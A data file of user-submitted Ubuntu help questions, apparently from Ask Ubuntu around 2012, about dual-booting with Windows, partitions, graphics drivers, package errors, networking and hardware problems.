224552	save windows 8 files and install ubuntu	i would like to install ubuntu on my laptop . i am new to ubuntu and therefore have some questions : 1.my hardware is acer emachines intel celeron t3000 1.8 3 gig of ram and native intel intergrated graphics card . can i run ubuntu on this machine without any problems ? 2.i am windows user and currently have windows 8 . i want to install ubuntu but want to save all my directories on c : \ d : \ disks so that i can open my files in ubuntu . is it possible to save my current directory system and save all my files after installing ubuntu ? can i open all my files ? i have very important data in files so i dont want to lose them at all : ) thank you
224555	ubuntu installation does not detect my disk partition by created by windows 8	i have bought a new asus k55vj laptop and i have installed windows 8 . now i want to install ubuntu 12.10 but ubuntu installation does not detect my disk partition . it only shows all hard disk and want me to delete all hard disk . how can i solve this problem ?
224556	how to install xfce without xubuntu-desktop or ubuntustudio-desktop	i want to install xfce without xubuntu-desktop or ubuntustudio-desktop ( original xfce 4.10 , without extras ) . i too want to keep unity ( and unity 2d ) on my computer . is the xfce-meta package great for that ? thanks in advance !
224559	how to find all the used ip addresses on a network	in my work there is a lot of computer and i want make a joke . i can close computer over the network but finding ip addresses is hard to me . how can i easily find all online ip adresses from 192.168.1.aa to 192.168.1.zz ?
224563	raid drives unusable because of faulty update to 12.10	i accepted the update to ubuntu 12.10 . after this , my system would only enter memtest86+ . i tried a rescue cd , but did not understand the options . i tried to copy one of the 2 raid drives but it can not be mounted in a usb enclosure . then i installed ubuntu on one of them . i can see both drives , but when i mount one of them , there is nothing in home . i am presently copying the second drive completely into a .img file . but i am afraid that my data will be inaccessible because they are partly encryped . these data are for my business , i absolutely need them . who can help ? thanks a lot ! marc
224566	gmail not visible in unity panel	i am trying to get gmail integration working with my brand new 12.10 installation . so far i have installed unity-mail and unity-webapps-gmail packages . i have also added two of my gmail account in online accounts tool . the current state is i can start gmail app from dash , which open gmail tab in firefox for the first of my email accounts . however , i do n't see the `` gmail '' option in unity panel it top right - only empathy . any ideas ? i would also appreciate info on how to debug unity panel icons in general .
224569	how to upgrade back to xorg 1.13 after downgrade to 1.12 in ubuntu 12.10 ?	i had to downgrade xorg from 1.13 to 1.12 in order to use the fglrx-legacy but it ( fglrx-legacy ) did n't work for me neither fglrx . so , is it possible to upgrade xorg back to 1.13 ? and how ?
224570	how to extend an existing partition with newly installed hard drive	my hard drive space almost running out , so i installed a new hard drive . my question is , can i extend an existing patition with newly installed hard drive ? e.g . existing /dev/sda1 /dev/sda2 /dev/sda3 new hard drive /dev/sdb1 can i extend /dev/sda2 with /dev/sdb1 thanks in advance !
224576	no way to use opendns on pppoe connection ?	i have an old speedtouch usb modem ( revision 0 ) and on my desktop with xubuntu 12.04 i 've configured a pppoe connection . i can connect and my isp assign an ip address and the dns but the primary dns address is not reachable by ping , the secondary yes but no address is resolved then i ca n't surf the web . then i want to set the open dns but there is bo way , if i change manually /etc/resolv.conf it is rewrited by some script ( there is the flag usepeerdns on the configuration script , if i exclude it there is no way to assign any dns server because resolv.conf is not read ) also if i set not writable the file changing the default permission . i changed dhclient.conf with the code prepend domain-name-servers 208.67.222.222,208.67.220.220 ; and now if i connect by a wifi connection to my router i 'm using opendns server but ppp does not use this script as long as i can see and the dns server is always setted by my isp . how can i use set dns manually to a ppp connection ? is there any way to change it after the connection ? why networkmanager is not able to manage my dsl connection , it seems not able to manage the dsl usb cable modem . if i use pppoeconf networkmanager does n't start and i have to manually delete the lines added to /etc/network/interfaces because the system is not able to start with full configuration of network if i connect a modem-router to the same line i can surf with the dns server assigned by my isp , i ca n't figure why . some suggestion ? thanks to all the problem is that networkmanager does n't manage my usb adsl modem ( speedtouch 330 ) . also if i try to set the interface in /etc/network/interfaces networkmanager process does n't start when i reboot the system and i have to restart it manually after large delay before the system is ready . in any case it is not the dns supplied by my isp the problem because if i address a query to the dns server expliciting its address it answer the query , if i not explicit the dotted address of the dns server the pc answers that no server is reachable . the file /etc/resolv.conf is a symlink to /etc/ppp/resolv.conf that is updated when i connect then i do n't understand because the system does not use the dns listed in the configuration file
224579	is is possible to use a ntfs usb disk as a liveusb with startup disk creator ?	i have an usb harddrive with ntfs ( for compatibility with windows and support of large files , so fat is not an option ) . i would like to use that harddrive as liveusb . ubuntu help says that it is possible , but startup disk creator refuses : i have set the flags on the ntfs partition to boot . is there a mistake in the documentation , or am i missing something ?
224580	how to add command-line arguments support to a quickly 12.08.1 application ?	i 've upgraded quickly to 12.08.1 and it wiped command-line arguments support from bin/project-name along with adding # # # do not edit this file # # # but i 'm using arguments for the quicklist . therefore , subj . additionally , to the quickly developers : what was the problem with main executable being changable ?
224581	wubi install , reinstalled windows , ca n't work with ubuntu now	i had installed ubuntu in win os under different partition ( e : ) and then formatted my windows ( c : ) , now i am not able to see the partition that had the wubi virtual disk on it ( e : ) and i do not get the option of booting ubuntu os when the pc starts up . kindly assist me to recover my partition ( e : ) and give me the steps as in what is to be done before installing the ubuntu so that it can be recovered easily next time . thanks , amit
224587	which driver should i download for an hp pavilion dm1-4160sp ?	first , sorry for my poor english . i am enjoying very much ubuntu 12.10 , but i have a problem with the ati video driver . i want to download the driver from amd web page , but i ca n't indentify the respective driver for my notebook hp pavilion dm1-4160sp . i tried e-series-apu , radeon hd series 6310 ... so far all failed even jockey ca n't help me , it always sends the same error : `` /var/log/jockey.log '' . so , i need to know which is the option i have to choose in amd web page to get the proper driver for my laptop . i do n't want to use open source driver , it makes my pc too hot .
224592	how to install wine on ubuntu 12.10 ?	i have downloaded wine-1.5.18.tar.bz2 . i do n't know how to install it on ubuntu 12.10 . please help me out of this problem . i do n't want to install it from ubuntu software center . i have the file that i have already downloaded .
224593	ffmpeg multi pass encoding	sorry , i am really new to this , and have problems doing some tasks without help . so i have a terminal command : ffmpeg \ -y \ -i '/media/levan/beea60d8ea608e89/downloads/videos/tony braxton - un-break my heart.vob ' \ -s 1920x1080 \ -aspect 16:9 \ -r 25 \ -b 15550k \ -bt 19792k \ -vcodec libtheora \ -acodec libvorbis \ -ac 2 \ -ar 48000 \ -ab 320k \ ddd.ogg and i want to have 3 pass video in output video , but how do i accomplish this ? i found that i must write -pass n command some where , but where to write it i do not know . i tested this and wrote -pass 3 at the end but then the terminal just showed a > symbol .
224594	how to remove wine program entries from the `` open with '' list ?	i have a seemingly simple problem that 's been bugging me for a while now . i have installed wine at some previous point , and i am offered to choose from shortlist , when i right click a suitable program , to run it by wine . however , there are newer versions available from the one that i am offered . i would like to uninstall this version , and instead use a new one . however , it is not installed as software package , which impedes solution . where do i go from here ?
224597	lan chat b/w ubuntu and windows	two users on the lan running empathy can see each other under 'people nearby ' ( telepathy-salut implementing link-local xmpp protocol ) . is there a chat program in windows that can see ubuntu users on a lan running empathy only ? i would really not like to set up a jabber lan server .
224598	sub-process /usr/bin/dpkg returned an error code ( 2 )	dpkg : warning : 'ldconfig ' not found in path or not executable . dpkg : error : 1 expected program not found in path or not executable . note : root 's path should usually contain /usr/local/sbin , /usr/sbin and /sbin .
224600	web short-cuts on dash-11.10	i 'm using 11.10 , and my web browser is chrome . not chromium , just chrome . i want to access web-links with just a click . and i want to get to these using dash . can i do this ?
224604	how to search google in dash ?	how do you get dash to search google results ?
224609	should i install programs from a source tarball ( `.tar.gz` ) , from the ubuntu software centre , or from elsewhere ?	there are several ways to install an application in ubuntu : you can download a source tarball ( generally a .tar.gz or a .tar.bz2 file ) and install it manually . ( see how to install a .tar.gz ( or .tar.bz2 ) file ? ) you can download a .deb file and install it manually , using dpkg or the software centre . you can search for the application in the ubuntu software centre and install it there , or use apt with the official ubuntu repositories . you can find a ppa or a third-party repo , and install it from there . what are the pros and cons of each method ? please discuss security implications , frequency of updates and program reliability of each method in your answer .
224616	how to deal with bugs in proprietary legacy driver ?	i 'm facing serious bugs in my proprietary amd/ati display drivers . where do i report bugs regarding such drivers ? do proprietary drivers get modified by community to provide latest fixes at the expense of decreased stability ? this https : //help.ubuntu.com/community/reportingbugs did n't answer my question . related : will amd continue to update the legacy fglrx driver ?
224619	how to resolve wireless disconnect problem in atheros ath9k	i have a non stopped problem in my acer aspire 5733 model using atheros ath9k driver . wifi is working when router is in nearby location , there is nothing updates by acer for linux . i also using rfkill list all command to check switches , it shows : soft blocked : no hard blocked : no i searched everywhere on ubuntu forum but did n't find any result for aspire 5733 , also i could n't found any firmware for atheros like broadcom . this is a big disadvantage of acer with ubuntu . also , i do some stuff to resolve this problem is to create a file named ath9k.conf : /etc/modprobe.d/ath9k.conf with the contents : options ath9k nohwcrypt=1 please suggest me optimal solution for this problem .
224622	no screens found	i have installed ubuntu 12.04 on a samsung nc-110 . it works perfectly from the usb stick . but once i reboot to use the installed os on the hard disc i get a black screen , and then a window telling me that there has been a fatal error : `` no screens found . '' what do i do , step by step , to remedy this ?
224623	software center remains unrepaired	the last time i had a broken software centre , i managed to fix things through upgrading linux to a newer version . regrettably as i have the latest version , this is no longer possible . yet the same problem persists . when i run software centre , i am being told it is broken and needs repairs . i click on a button offering me to fix it . it is fixing itself for a while and then this happens : installarchives ( ) failed : pednastavuji balky ... pednastavuji balky ... pednastavuji balky ... pednastavuji balky ... ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 301765 files and directories currently installed . ) unpacking wine1.4-i386 ( from ... /wine1.4-i386_1.4-0ubuntu4.1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/wine1.4-i386_1.4-0ubuntu4.1_i386.deb ( -- unpack ) : trying to overwrite '/usr/bin/wine ' , which is also in package wine1.5 1.5.5-0ubuntu1~ppa1~oneiric1+pulse17 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/wine1.4-i386_1.4-0ubuntu4.1_i386.deb error in function : dpkg : dependency problems prevent configuration of wine1.4-common : wine1.4-common depends on wine1.4 ( = 1.4-0ubuntu4.1 ) ; however : package wine1.4 is not installed . dpkg : error processing wine1.4-common ( -- configure ) : dependency problems - leaving unconfigured what do i do ?
224627	xubuntu 12.10 wo n't boot into desktop on xps l502x	my xubuntu 12.10 wo n't boot into desktop on xps l502x after today 's update and reboot ( newer version of linux kernel included ) . when i installed xubuntu 12.10 on this xps l502x , i got the same problem -- the login screen wo n't show , but i can ctrl+alt+f1 to login to the console . afterwards , i installed bumblebee , which solved the problem . however , now the problem comes back again . although i can still login to a console and type startx to get a desktop environment , there are some desktop customizations and settings missing in this environment . i tried to start with the former version of linux kernel but it did n't help . anyone else who has ever met this problem ? additional info : every time i start the desktop environment using startx , i will get a crash report from the notification area , saying that xorg has crashed .
224629	keylock indicator for xfce panel	is there a keylock indicator applet for xfce panel ( preferably native to xfce ) ? i have almost switched to xfce , except for this !
224631	ubuntu 12.04 software installation of partimage	i have ubuntu 12.04 on a dual boot laptop with windows vista i installed partimage through software centre in ubuntu ( 12.04 ) , but it is not shown in the list of installed software through dash . hence i can not use it even though software centre says it is installed . what to do now ?
224637	is there a complete tutorial for upgrading for dummies ?	i have tried upgrading in the past with zero success doing a backup of stuff and futilely attempting to enter my stuff into the new version . my email accounts and folders , my bookmarks and web browser info and of course my photos . in the past i have received messages that the back up files were done using version xxx and can not be read by the new system , as an example . i need a hand-holding tutorial to go from 11.04 to 12.10 . what are the actual step by step mechanics ? frustrated non-geek
224639	how to enable trim on lvm on ubuntu 12.10 ?	when i reinstalled ubuntu 12.10 64-bit on my ssd , i chose the option to use lvm in ubiquity . i am trying to find out how to enable trim for my ssd . i came across this article : http : //worldsmostsecret.blogspot.com/2012/04/how-to-activate-trim-on-luks-encrypted.html the article states in addition to adding discard and noatime to /etc/fstab , discard must be added to the drive ( sdx_crypt ) in /etc/crypttab . my problem is the only listings in my /etc/crypttab are several cryptswap ; it does not list any sdx_crypt . i currently have a /dev/sda1 ( ext2 ) , which is the boot point , and /dev/mapper/ubuntu-root , which is my ext4 partition . any ideas as to how to enable trim ?
224641	dual boot to windows 7	i just installed ubuntu 12.10 alongside windows 7 but now my computer automatically boots to ubuntu . i want windows 7 as my default operating system . when i start up my laptop it shows me no settings or any screen asking me what operating system to use . the only way for me to boot into windows 7 not is to hit f12 at startup to bring up which to boot from , select my hard drive then bring up the grub loader in ubuntu , then select windows 7 loader . when i go into msconfig in windows 7 only windows 7 is listed under the operating systems ... i see no ubuntu at all . please help this is really annoying ! thanks .
224644	windows 2000 dual boot	upgraded ubuntu then attempted to un-install the upgrade . unfortunately , ubuntu was removed entirely and the older version no longer available for re-installation . the new version can not install in windows 2000
224645	make mex compiler of matlab working on mint ?	mex compiler of matlab does not work with following error warning : you are using gcc version `` 4.7.2-2ubuntu1 ) '' . the version currently supported with mex is `` 4.4.6 '' . for a list of currently supported compilers see : http : //www.mathworks.com/support/compilers/current_release/ /home/krm/matlab/bin/mex : 1 : eval : g++ : not found mex : compile of ' `` fv_cache/fv_cache.cc '' ' failed . it is obvious that i need preceding version of gcc but this specific version is not included in software manager of mint . i installed gcc-4.4 but it does not recognized by matlab . i also removed latest version from my computer and set gcc as a environment variable points to gcc-4.4 but again does not work . is there any other way around to solve that issue ? maybe a interface or something .
224649	how to run a command asking password in background ?	i want to run a command sudo apt-get update & . however after hitting enter , when i hit for jobs , it shows the status of these commands as stopped . my guess is that by pushing the process into background i did not provide it an opportunity to ask password . is there a way to run a process in background which requires a password ?
224651	can not use apt-get/dpkg -- input/output error	i have bumped into an issue that does n't allow me to do anything related to apt-get : install , remove , etc . whenever i try to do something ( e.g . sudo apt-get install firefox -f ) it gives me the same error message : reading database ... dpkg : unrecoverable fatal error , aborting : unable to open files list file for package `fontconfig-config ' : input/output error e : sub-process /usr/bin/dpkg returned an error code ( 2 ) i have tried to deal with the package `fontconfig-config ' without success . i have found that the `` input/output error '' is usually linked with physical problems of the hard drive , but i do not think that 's the case i am using that hd without any other problem . i have tried removing the mention to the package in /var/lib/dpkg/status as mentioned here . i have tried deleting all files related to the package in /var/lib/dpkg/info as i found somewhere . but i still can not do anything . the funny bit comes when i look for the file that is giving me troubles : mecho @ ansible-ms-7680 : /var/lib/dpkg/info $ ls fontconfig* ls : can not access fontconfig-config.list : input/output error fontconfig.list fontconfig.postinst fontconfig.preinst fontconfig.triggers fontconfig.md5sums fontconfig.postrm fontconfig.prerm this is done after i deleted all files ... it looks like fontconfig-config.list still exists but it does n't show up ! any idea about how to solve the problem ? i am on kubuntu precise , fontconfig-config_2.8.0-3ubuntu9.1 i do not have smartmontools installed nor any other programme i could use to check the hard disk . the most similar think i seem to have is kde partition manager but it does n't allow me to check anything ( the option appears unavailable ) . however , i think the problem is not the hd . how do you suggests me to do the fs check ? fcheck is not installed and i can not think of any other command in bash ( as i do not think i have anything else installed that could perform a check ) . thank you . edit : i have found the command ( silly me ) , fsck . this is what i got : /dev/sda1 : recovering journal clearing orphaned inode 4456702 ( uid=1000 , gid=1000 , mode=0140775 , size=0 ) clearing orphaned inode 4456700 ( uid=1000 , gid=1000 , mode=0140775 , size=0 ) clearing orphaned inode 4456699 ( uid=1000 , gid=1000 , mode=0140775 , size=0 ) clearing orphaned inode 4456697 ( uid=1000 , gid=1000 , mode=0140775 , size=0 ) clearing orphaned inode 4456694 ( uid=1000 , gid=1000 , mode=0140775 , size=0 ) clearing orphaned inode 4456693 ( uid=1000 , gid=1000 , mode=0140775 , size=0 ) clearing orphaned inode 4456688 ( uid=1000 , gid=1000 , mode=0140775 , size=0 ) clearing orphaned inode 4456481 ( uid=1000 , gid=1000 , mode=0140775 , size=0 ) clearing orphaned inode 4456692 ( uid=0 , gid=0 , mode=0100600 , size=65536 ) clearing orphaned inode 4456689 ( uid=1000 , gid=1000 , mode=0140775 , size=0 ) clearing orphaned inode 4456709 ( uid=1000 , gid=1000 , mode=0100600 , size=714046 ) clearing orphaned inode 4456469 ( uid=1000 , gid=1000 , mode=0140775 , size=0 ) clearing orphaned inode 3672644 ( uid=0 , gid=0 , mode=0100644 , size=1595 ) clearing orphaned inode 1324021 ( uid=0 , gid=0 , mode=0100640 , size=1980 ) clearing orphaned inode 1324014 ( uid=0 , gid=0 , mode=0100640 , size=126 ) clearing orphaned inode 4456499 ( uid=1000 , gid=1000 , mode=0100600 , size=0 ) clearing orphaned inode 4456483 ( uid=1000 , gid=1000 , mode=0100600 , size=65536 ) setting free inodes count to 7147142 ( was 7147702 ) setting free blocks count to 23891195 ( was 23781617 ) /dev/sda1 : clean , 151930/7299072 files , 5292549/29183744 blocks
224654	touch pad nolonger working	i 'm running 12.07 on an acer aspire and have had no problems , until i disabled the touchpad using the fn and f7 keys . this disabled the touchpad fine . but when i went to turn it back on i got the enabled icon appear but the pad did n't work . the computer has been rebooted since this happened but this has made no difference . it is enabled in the settings , usb mouse works fine .
224655	copying photos from camera stalls - how to track down issue ?	when i copy files from my camera ( connected via usb ) to the ssd in my laptop a few files get copied and then the copy stalls . i 'm not sure why , any ideas or things to investigate appreciated , or bug reports to go and look at . i have read this answer - the camera ( canon 40d in case that matters ) mounts fine using gvfs . i can see the photos in nautilus , or in the terminal ( in /run/user/username/gvfs/ ... ) and i can copy a few photos , but not many . using the terminal or nautilus the process hangs until the camera goes to sleep . digikam fails to copy any at all , as does rapid photo downloader . shotwell did manage it in the end , but that is very much a work around for me . i have disabled thumbnail generation by nautilus . load average stays about 1 while this is happening , while cpu usage is half idle , half wait ( and a little user/sys for other programs ) . none of the programs at the top of the cpu list in top are related to copying photos . there is not much in the logs - from /var/log/syslog dec 2 16:20:52 mishtop dbus [ 945 ] : [ system ] activating service name='org.freedesktop.udisks ' ( using servicehelper ) dec 2 16:20:52 mishtop dbus [ 945 ] : [ system ] successfully activated service 'org.freedesktop.udisks' dec 2 16:21:24 mishtop kernel : [ 2297.180130 ] usb 2-2 : new high-speed usb device number 4 using ehci_hcd dec 2 16:21:24 mishtop kernel : [ 2297.314272 ] usb 2-2 : new usb device found , idvendor=04a9 , idproduct=3146 dec 2 16:21:24 mishtop kernel : [ 2297.314278 ] usb 2-2 : new usb device strings : mfr=1 , product=2 , serialnumber=0 dec 2 16:21:24 mishtop kernel : [ 2297.314283 ] usb 2-2 : product : canon digital camera dec 2 16:21:24 mishtop kernel : [ 2297.314287 ] usb 2-2 : manufacturer : canon inc. dec 2 16:21:24 mishtop mtp-probe : checking bus 2 , device 4 : `` /sys/devices/pci0000:00/0000:00:1d.7/usb2/2-2 '' dec 2 16:21:24 mishtop mtp-probe : bus : 2 , device : 4 was not an mtp device this problem has only started recently and i 've had all the hardware for ages . i have also recently upgraded to 12.10 , though i 'm not sure if the problem started when i upgraded or after the upgrade . i also note this similar question but it is currently unanswered and i 'm providing more detail
224660	xubuntu is not seeing my win8 os in the installer	when i install xubuntu , i get the message `` this computer currently has no detected operating systems . what would you like to do ? '' . i just did a fresh install of win8 yesterday , and i guess it used efi because i have a 104mb partition that is of type 'efi ' . is there any way to install xubuntu next to win8 , and avoid any boot problems ? or can i switch win8 to bios from efi , without having to re-install windows ? i went through a ton of boot problems and re-installing yesterday ... i really do n't want to have to do it again .
224661	why do my desktop folder links keep breaking whenever i turn off ?	i keep trying to make a link to my windows account on the c : drive , however it keeps messing up everytime i reboot the system . it will say that the link is broken and to move to trash . this is how i would get the folder : /media/michael/os/users/michael , then i would make a link to michael and drag the link to the desktop . any ideas on how to get the link to stay ?
224662	can never change my subscription	every time i log into ubuntu one there is a message telling me that no account changes can be made while the system is updating which can take 2 hours . so i am never able to modify anything . this bugs me because i am paying for the service and now i have no control over the payment process or what i want to do . what gives ?
224663	how to patch fglrx for installation on kernel 3.7rc7 ?	for a bug i need to check if a bug still occurs on upstream kernel 3.7rc7 , and since the bug is related to fglrx i need to install a newer version as well that work with kernel 3.7 . how do i do this step by step ?
224665	grub-efi wrong resolution	my question , as it comes from the title , related to grub , but it 's a different thing . i re-installed windows 7 and ubuntu 12.10 in uefi mode ( before that i was using normal bios ) and everything went perfectly fine . both systems load as they should but there is one thing that keeps bothering me . the problem is before i installed both systems in uefi i used to boot in both system using common grub ( non-uefi ) and resolution in this grub was correct ( which is 1366x768 ) . right now with grub-efi i have wrong resolution ( which is seems to be 640x480 ) . so my question is can can i safely set grub-resolution using grub config files or issue is related to something else ? ( for instance graphics card ) . i am using ubuntu 12.10 intel hd 3000 + nvidia gt 540m optimus ( i am using bumblebee ) kernel 3.5.0-19-generic all updates installed ! i also added ubuntu x-swat ppa for drivers . thank you for your help !
224667	lenovo g580 and ubuntu 12.04.1 - no internet access at all ( both wired and wifi )	i just bought a new lenovo ideapad g580 leptop . my machine is now dual booting for both win7 and ubuntu 12.04.1 . the issue i 'm having is that i do n't have internet access at all ( from both wired connection and wifi connection ) . i saw some topics describing such issues , but all were for either a wired connection that was not working or a wifi connection that was not working . all solutions required one of them to work ( so that a package could be downloaded ) , but in my case i do n't have both . at first , i thought that this is a hardware issue , but the wifi is working perfectly fine within win7 ( i 'm dual booting , remember ? ) . i must admit i never tested the wired connection within win7 . of course i had to install a driver for win7 from the disk i got with the laptop to make it work , but there is no corresponding driver for ubuntu . i tried searching for such a driver in lenovo 's website with no results . can anyone help me with my issue ? thanks in advance edit : just thought it might help with resolving the issue . when saying that the wifi connection does n't work , i was n't accurate . sometime ( in those very rare attempts to connect to the internet ) , i can see my wireless hotspot on the list ( and only mine . for some reason i ca n't see other hotspots that are present nearby ) . when trying to connect to it , i 'm typing my password and waiting for a long time to get a pop-up asking for my password again . this is happening 3-4 times until my wireless hotspot is being removed from the list of wireless connections . again , when booting to win7 - no issues at all ( and i can see in my hotspot-list other options too ) .
224669	how to run some alias command in bash 's non-interactive mode	i want to run some alias command in bash 's non-interactive mode . but seems ubuntu ignore bahs_env . how can i make it work ? la is a alias command . and i tested in other linux . it is work fine . just ubuntu not work . bash_env=~/.profile bash -o expand_aliases -c la
224671	ubuntu requirements on dell xps t500	could i install ubuntu on a dell xps t500 witha 500 mhz cpu and 1128 mb of ram installed ? ? ? my friend and i are using it to run a website server . great thanks to anyone who responds !
224674	auto shutdown server if there was no activity	my server should shutdown after 01:00 am , if there was no activity in the past hour . lets say there was the last connection at 00:43 then it should check again at 01:43 . how to write such a script/how to get last login time ? based on ssh connection
224679	two finger scroll gone after changing click functionality	so my touchpad click functionality did not work properly . it was somewhat ( it 's still acting a little funny ) fixed now by another solution i found here ca n't hold left button on touchpad and drag in 12.04 and no right click however , after this fix , suddenly the two finger scrolling option is gone which wรกs there before . does anyone have an idea why this is and how i can bring it back ?
224680	upgrading graphics card ( from ati to nvidia ) . how to do it properly ?	i am thinking of upgrading my old ati/amd radeon 4870 to nvidia ( 610 or 620 , maybe 630 ) . i am not playing games . i like compiz effects though . i use ubuntu 12.10 . anyway , i would like to ask how to do it properly . i think i have to remove proprietary drivers first ( ati legacy 12.06 ) , restart and install nvidia proprietary drivers , then . this is what i did in order to install my ati drivers : sudo add-apt-repository ppa : makson96/fglrx sudo apt-get update sudo apt-get upgrade sudo apt-get install fglrx-legacy ps : any advice on a good but inexpensive nvidia card would be greatly appreciated , too . ps2 : wiil i need to upgrade my xorg ?
224686	flashing screen during videos and games	i recently switched from vista to ubuntu 12.10 on my hp laptop and i 've been having issues with my graphics . everything is fine till i watch a video/play a game or ( sometimes ) when i visit the software centre . at that point large portions of the screen start flashing and everything gets rather slow . i 'm looking for a way to remedy this . for reference i 'm using firefox and i 'm unsure what my video card is because it 's listed as unknown when i check my system settings .
224687	windows vista partition deleted during dual boot ubuntu install	i recently added 12.04 to a computer . during the partitioning only two partitions were listed , recovery , and the new ubuntu partition . i shunk the ubuntu partition and left the extra space an free since i could n't get the crappy partitioner now included with ubuntu installs to expand the windows parition . i proceeded thinking the recovery partition had the files , pictures , etc . on it . after installing ubuntu i used gparted to shrink the ubuntu partition , and expand the recovery partition . when i tried to boot into windows i discovered my mistake . i used testdisk to try and recover the windows partition with the missing personal data , but when i view the folders in testdisk , none of the personal files are there . i guess the data could be overwritten , but i 'm hoping it 's still there somewhere . as a last resort i 'm going to recover the largest partition on listed in testdisk , which has an hp ( computer is hewlett packard ) , and seems to consist of the entire hard drive . if i still do n't have the data , is there anything else i can do . for anyone else searching for help , always back up your data before you perform these types of operations . if i had done that i would have saved myself two days of work .
224693	ca n't start ubuntu - package power limit notification	i used ubuntu 12.10 on my current laptop for a couple of weeks without problems ... now there is no way to start it . when i try to boot ubuntu during the startup process i get this error : [ cpu0 ] : package power limit notification ( total events = 1 ) [ cpu2 ] : package power limit notification ( total events = 1 ) [ cpu1 ] : package power limit notification ( total events = 1 ) [ cpu3 ] : package power limit notification ( total events = 1 ) and it 's like i ca n't do anything . i 'm on a sony vaio laptop and the cpu model is : intel core i7-3520m cpu @ 2.90ghz
224699	packages install but do n't display ?	i 'm having yet another problem with ubuntu 12.04 today . whenever i download a package from the ubuntu software center , it installs but does n't show anywhere on the computer at all . for example , i installed ufraw and looked in the launcher for the icon to start it up . but it 's not there . i 've done a whole system search but no programs i 've installed will display . can someone offer me some guidance of what to do please ? thanks .
224701	problem waking up after suspending	i daul-boot windows xp 32 bit and ubuntu 12.10 64 bit . i have been having problems waking up after suspending ( sleeping ) on both os 's . on ubuntu it shows a black screen with an a weird error message for about 6 seconds and then goes to the normal unlock screen . in windows , it just shows a black screen with no error message for 6 seconds , and then goes to the normal windows unlock screen . please help me this is getting really annoying . thanks !
224702	empathy with gnome online accounts ( goa )	how is empathy supposed to work in ubuntu 12.10 with gnome 3.6 ? i added my google and facebook accounts to goa and enabled `` chat '' for both , but empathy does not use the accounts . instead it says `` you need to setup an account to see contacts here. `` and opens the ubuntu online accounts . how can i fix this ? is there a bug report for this ? i at least found bug reports and a blog post that i linked to in my answer below . i still would like to know why empathy , as a gnome application , does not work with goa even when i compile and run a version from gnome.org .
224706	eth0 ( dhcp ) works only in its native network segment after update to 12.04	i 've got some strange effects in my network behavior after updating to 12.04 - before all worked fine : my network is segmented with my desktops residing in 192.168.1.0/28 . my dsl-router lives in a segment 192.168.1.64/30 . my internal router listens to 192.168.1.1 and 192.168.1.65 . my desktop receives its ip address as 192.168.1.8 and its default gateway off course to 192.168.1.1 all via dhcp . all ip addresses can be accessed within the network 192.168.1.0 , but if i ping 192.168.1.66 only the first icmp packet comes back correctly . all subsequent packages return with desination host unreachable - looks quite weird to me . the dhcpd.conf entry looks like : subnet 192.168.1.0 netmask 255.255.255.240 { option definitions common to all supported networks ... option domain-name `` kesenheimer.org '' ; option domain-name-servers 81.173.194.68,194.8.194.60 ; option routers 192.168.1.1 ; range 192.168.1.3 192.168.1.14 ; } host beate { # ethernet address of the client machine hardware ethernet 00:0d:60:70:0d : ef ; # ip address to assign fixed-address 192.168.1.8 ; } i 've configured the networkmanager to : [ main ] plugins=ifupdown , keyfile [ ifupdown ] managed=false and /etc/network/interfaces to : auto lo iface lo inet loopback auto eth0 when i start the network configuration tool , all information sent by dhcp is displayed correctly . i 'm not sure how to fix this problem .
224708	how to transfer files between an ubuntu machine and windows machine ?	i have a desktop pc with ubuntu and a laptop with windows 7 . i 'd like to transfer lots of files and archives from the desktop to the laptop . when i want to share a file , says i should install some windows stuff and does n't allow it because it is untrusted . how can i transfer all my data via ethernet or something similar ?
224709	how to run an action when clicking on an appindicator	i 'm looking at writing a simple app indicator and i need it to update it 's information whenever it 's clicked on to open the menu . is there any kind of on_click action thing ? let me rephrase it then : how to perform an action ( any action ) when the user clicks on the appindicator to open its menu ?
224711	sometimes there 's no indicator-sound playback menu for audacious v3.3.2 ?	if i run audacious via keyboard shortcut , there will be no indicator-sound playback menu for that app on my top panel , below the speaker icon . however , if i double-click the audio file ( or if i click at `` audacious '' right below the speaker icon from the top panel ) , the audio controls ( previous , play , pause , next ) will be visible there , as expected . here 's the screenshot what 's happening when i run audacious via keyboard shortcut . there is no playback menu within the indicator-sound for audacious . i guess it could be a bug . is there a fix/workaround for this ?
224712	trouble installing from usb stick	i get the following error message while trying to install ubuntu 12.10 from usb stick : '' error : no configuration file found no default or ui cnfiguration directive found ! boot : '' can you suggest solution ?
224715	how to configure unity with shortcuts to `` printer '' , `` display devices '' and `` system control panel `` in the panel ?	i would like to configure unity session indicator in 12.10 like it was before in version 12.04 . because i miss the practical shortcuts to `` printer '' , `` display devices '' and `` system control panel `` in the menu . is that possible ?
224717	automatically sign package files from debuild and upload with dput	i 've created a source package for i library i 'm working on . i use debuild to build it and then i can successfully upload it with dput . now i want to set it up so that i can do this automatically from jenkins . the main issue i 'm running into is signing the .dsc and .changes files . what i 'm trying to do is sign the packages with gpg rather than having debuild do it . this way i can sign the files automatically with the gpg option -- passphrase-fd 0 . so i use debuild with the options -uc and -us and then clearsign the files with gpg . but when i do this it creates a separate .dsc.asc and source.changes.asc . when i then try to upload with dput i get the error checking signature on .changes gpg : no valid openpgp data found . gpg : the signature could not be verified . please remember that the signature file ( .sig or .asc ) should be the first file given on the command line . this would seem to suggest that i should list the .asc file as an argument to dput but i ca n't get this to work .
224718	change swap amount to hibernate in wubi	i would like to hibernate when i get critical battery , i could do this in windows , but the option is disabled in ubuntu . i finally decided this was because i only have 256mb of swap . i am currently using wubi , is it possable to change the amount of swap i have ? similar question
224725	is an ubuntu phone os being developed or are plans limited to ubuntu for android ?	things is getting a bit confusing . there are posts on blogs and websites about an ubuntu phone os , which is a phone that runs on an ubuntu os solely . there are plenty of designs out there for unity adapted to a smartphone . however , the only reference to phones on the ubuntu website is the ubuntu for android page which seems to be a project that enables ubuntu to run alongside android and it is seemingly not an independence phone os but a means to unite the desktop with the mobile platform . are there really no plans for an independent ubuntu phone os ?
